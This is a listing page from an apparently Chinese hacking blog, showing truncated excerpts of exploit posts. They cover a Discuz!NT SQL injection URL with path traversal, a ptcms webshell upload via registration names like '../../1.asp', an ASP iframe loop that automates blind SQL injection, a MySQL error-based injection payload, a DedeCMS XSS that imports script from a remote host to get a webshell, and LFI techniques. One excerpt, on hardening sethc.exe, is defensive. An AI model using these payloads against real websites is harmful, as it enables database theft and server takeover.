DNT存在SQL注入漏洞

注入地址: http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1 利用: http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercon...

- 阅读全文 -

防止替换shift后门提权(sethc.exe后门)

   在很多情况下,在提权比较艰难的时候,替换shift后门提权很方便,为了防止shift后门被利用,得对它设置权限。防止简单替换shift后门提权。 一、sethc.exe存在于 c:\windows\system32\sethc.exe和c:\windows\system32\dllcache\sethc.exe 这2个目录之下 为了防止简单替换sethc.exe提权,可对sethc.exe设...

- 阅读全文 -

ptcms小说小偷程序 最新EXP漏洞

于没有带到数据库检测 而是直接验证程序内有没有这个文件名的文件夹, 那么我们注册../../1.asp; 或者../../2.asp 然后在书架或者收藏哪里插入一句话, 对应的木马地址是   https://www.webshell.cc/1.asp/mark.ptv ps://针对解析漏洞的 鸡肋 下面放出落叶的exp 怕在下面大家看不到哈。 <?php //error_repor...

- 阅读全文 -

字符型SQL注入猜解,利用iframe显示更方便

遇到一个注入点 是字符型的 测试了几个工具 貌似都不行 那就只有手工了 大家都知道 到猜解值的时候 一个一个asc大小的比较 还是比较麻烦的 所以想到这个 <% for s=40 to 128 response.write "<iframe src=""https://www.webshell.cc/default.asp?id=111111' and 1=(select top 1 c...

- 阅读全文 -

php+mysql高级爆错注入经测算有效

之前想找个测试 没想到这有 可以测试下做个记录而已 http://webshell.cc/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0...

- 阅读全文 -

ptcms小说小偷程序鸡肋漏洞

看了一下最新的ptcms小说小偷程序 ,发现之前的漏洞已经修补了,那么先看下如何修补这些漏洞的! 看注册文件上次的写入资料 exit(); } include '../data/user.php'; $username=$_POST['username']; //写入资料信息 $str=$password."\n".time()."\n".$_SERVER["REMOTE_ADDR"]; $fil...

- 阅读全文 -

dedecms xss 通杀所有版本 dede 5.6 dede 5.7 直接获取webshell

DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)   目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个: 开启注册 开启投稿 注册会员-发表文章投稿,内容如下填写: <style>@im\port'\http://webshe...

- 阅读全文 -

利用phpinfo信息LFI临时文件

还记得之前国外某牛提出的LFI包含临时文件么? 当时确实觉得有些鸡肋,因为临时文件的路径及名字是未知的,虽然临时文件的名字可以利用类似<>*?等通配符(我们暂且称其为通配符)匹配,而同时N个人一起请求的话可能同时生成很多临时文件,因此用通配符也不一定能匹配成,而且临时文件保存的路径也只能靠猜。 我们知道在向服务器上任意php文件post请求上传数据时,都会生成临时文件,以前不知道临时文...

- 阅读全文 -

LFI漏洞利用总结

主要涉及到的函数 include(),require()、include_once(),require_once() magic_quotes_gpc()、allow_url_fopen()、allow_url_include()、move_uploaded_file() 、readfile() file()、and file_get_contents()、upload_tmp_dir()、 po...

- 阅读全文 -